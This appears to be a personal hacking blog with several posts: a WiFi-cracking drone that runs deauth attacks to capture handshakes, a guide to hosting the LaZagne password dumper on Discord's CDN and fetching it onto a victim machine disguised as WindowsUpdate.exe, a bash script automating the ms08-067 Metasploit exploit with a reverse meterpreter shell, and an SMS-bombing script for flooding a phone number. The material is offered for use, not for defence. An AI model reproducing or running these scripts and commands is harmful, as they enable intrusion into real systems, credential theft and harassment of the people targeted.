Wifi Cracking Drone

I set out to create a drone with WiFi cracking abilities. Since drones can fly, they can minimize interference and maximize signal strength by flying directly above access points. Drones are designed to be light yet powerful. The setup I wanted to use needed to be light as to minimally affect the drones flying ability. I choose a light 1200 mAh battery from Adafruit and their PowerBoost 1000 to convert the batteries voltage to 5V at a steady 1 Amp. This was needed to power the RaspberryPi.

The Software Setup
Setting up the Pi took longer than expected. I began to follow the guide here. I was using a RaspberryPi 3 which has onboard WiFi as mentioned in the guide. Unfortunately because I wanted to utilize the tool set that comes with Kali, I had Kali installed instead of Raspian. This created some problems I’ll talk about later. To start, I installed and setup hostapd and udhcpd as follows:

sudo apt-get install hostapd udhcpd

Then I edited the config file at /etc/udhcpd.conf. I began by commenting out the lines the config file came with and adding the following at the bottom of the file.

interface wlan0
remaining yes
opt subnet
opt router
opt lease 864000

Then I commented out this line in /etc/default/udhcpd


Then I setup the address and netmask the Pi’s interface needed to use in /etc/network/interfaces.

iface wlan0 inet static

Next, I setup hostapd by creating the file /etc/hostapd/hostapd.conf. The bottom three lines are crucial to the RaspberryPi and we will return to the driver option later.

ieee80211n=1 # 802.11n support
wmm_enabled=1 # QoS support

One last step; editing the #DAEMON_CONF=”” line in the /etc/default/hostapd file to read:


Finally we just start up the services and tell them to start on boot!

sudo service hostapd start
sudo service udhcpd start
sudo systemctl enable hostapd
sudo systemctl enable udhcpd

Now back to that driver issue….
Since I was running Kali Linux, after an excruciating amount of time and frustration I found the firmware for the wireless card was simply not installed. Yes I used the SPECIFIC Kali image for the Pi, and NO it didn’t come with the firmware. Inside this firmware package is the nl80211 driver. Anyways, I fixed this with a simple apt-get and a reboot.

apt-get install firmware-brcm80211

The Hardware Setup

The hardware included:
RaspberryPi 3
Short micro-USB cable
Adafruit 1200 mAh battery
Adafruit PowerBoost 1000
TP-Link USB wireless card capable of monitor mode
DJI Mavic Pro

The PowerBoost’s connectors needed to be soldered on before I could continue.
Below is a picture before the hardware was put on the drone.


After a large amount of electrical tape, we were ready for flight.

It works!


The whole system worked surprisingly well. I was able to connect to the network the Pi was making with no problems. From there I ssh’d into the Pi. The aircrack-ng suite I used to capture the 4-way WiFi handshake worked decently. From what I could tell, the Pi just didn’t have enough power to make it’s own network AND run a network card in monitor mode. It just wasn’t discovering very many networks and struggled to capture the actual handshake after many de-auth attacks. A larger battery at a higher amperage could fix this.

EDIT 10/30/2017
After some issues with udhcpd I switched to isc-dhcp-server. Much faster and more reliable address assignment.

Using Discord’s CDN for Malware Delivery

According to Google a CDN is:

A content delivery network (CDN) is a system of distributed servers (network) that deliver webpages and other Web content to a user based on the geographic locations of the user, the origin of the webpage and a content delivery server.

Discord uses https://cdn.discordapp.com/ to display their content.
For example, when I send an image in a Discord server it is assigned a unique URL.
So I placed this image in an empty Discord server named testing.

But anyone can view it here.

What This Means

Discord’s CDN can be used to deliver malware to a target. In this case, I’m using Discord’s CDN servers to deliver LaZagne to an infected target. You can read about LaZagne here. In short, it dumps passwords from various apps and locations on Windows.

On the infected target, use PowerShell to download the file.

PS C:\Users\Ryan> Invoke-WebRequest -Uri https://cdn.discordapp.com/attachments/297956570850131968/297967232439418880/laZagne.exe -OutFile WindowsUpdate.exe

This has other implications as well. This link could be used in an email attachment for a basic phishing attack.

ms08-067 Remote Code Execution Automation

Microsoft Security Bulletin on the vulnerability.

Script for automation of discovery and exploitation of Windows XP ms08-067 remote code execution vulnerability.

chmod +x ms08-67auto.sh

What It Does
Enter an ip and a subnet for nmap to scan
nmap scans the OS’s and ports 139 and 445
grep filters results to only Windows XP or Server 2003
Prints results and confirm you want to attack
Gathers RHOST RPORT LHOST and LPORT values for a metasploit rc file
Opens created rc file in metasploit
Run exploit -j to begin

read -p $’\e[1;32mEnter the ip and subnet ex.\e[0m ‘ ipsubnet
echo -e “\e[1;31mScanning for ports 445 and 139\e[m”
scan=$(sudo nmap $ipsubnet -O -p 445,139)
ports=$(echo “$scan” | grep -E -B 3 -A 7 ‘445/tcp open|139/tcp open’ | grep -E -B 8 ‘Microsoft Windows XP|Microsoft Windows Server 2003’)
echo “$ports”
#echo $scan
read -p ‘Is there a target to attack? Press y:’ attack
if [ “$attack” = “y” ]; then
read -p $’\e[1;31mTarget IP address:\e[m’ rhost
read -p $’\e[1;31mWhich port is the service running on?:\e[m’ rport
read -p $’\e[1;31mWhich ip would you like to connect back too?:\e[m’ lhost
read -p $’\e[1;31mWhich port would you like to connect back on?:\e[m’ lport
sudo service postgresql start
echo -e “use exploit/windows/smb/ms08_067_netapi\nset RHOST $rhost\nset RPORT $rport\nset PAYLOAD windows/meterpreter/reverse_https\nset LHOST $lhost\nset LPORT $lport\nset ExitOnSession false” > windowsxp.rc
msfconsole -q -r windowsxp.rc

# 445 and 139


Flood an SMS Number

Flood a 9 digit number with as many messages as you please.
NOTE: For some unknown reason ATT receives each message from a new phone number even when using the same email like a Google account.

Enter the API key from twilio.
Make sure your domain is setup with Postfix or another smtp server. A Google SMTP server could be used as well.
Specify the domain by editing the script.
apt-get install sendemail.
chmod +x smsprank.sh
Change the second number in the if function to change the number of messages sent.

What It Does

First finds the carrier of the number
Then enter the numbers email and the message.
Takes a random number from 1000-9999 and sends a new message to the phone from that address.
ex. 4632@example.com, 6346@example.com, 9868@example.com

clear # Clear the screen.

echo -e “\E[1;33m::::: \e[97mE-MAIL SMS BOMBER \E[1;33m:::::\e[31m”

read -p ‘Find provider SMS E-Mail, Enter the 10 digit number: ‘ uservar1

curl -XGET “https://lookups.twilio.com/v1/PhoneNumbers/”$uservar1″?Type=carrier&Type=caller-name” -u “APIKEYHERE” #Query provider sms email

#read -p “http://freecarrierlookup.com/ http://www.emailtextmessages.com/”

echo -e “\n\nAT&T – phonenumber@txt.att.net, T-Mobile – phonenumber@tmomail.net, Verizon – phonenumber@vtext.com, Sprint PCS – phonenumber@messaging.sprintpcs.com, Virgin Mobile – phonenumber@vmobl.com”

#use proxy example curl –proxy socks5h://

echo -e “\E[1;33m::::: \e[97mLets setup email parameters \E[1;33m:::::\e[31m”

read -p ‘Message To? ex. 5555551111@vtext.com : ‘ uservar2 #Target sms email

read -p ‘Enter the message you would like to send : ‘ uservar4

echo -e “\E[1;33m::::: \e[97mBombs away PEW PEW PEW \E[1;33m:::::\e[31m”

for n in {1..15}; do sendemail -f $((1000 + RANDOM % 9999))@example.com -t $uservar2 -m $uservar4; done


WiFi Encryption with WiGLE WiFi

I drove around the main roads in my town using WiGLE WiFi on a Nexus 5.

Then exported the results to a KML file. Totaled over 10,200 WiFi Networks.

I wasn’t shocked to see about 150 WEP networks.

A few of these networks were owned by small business.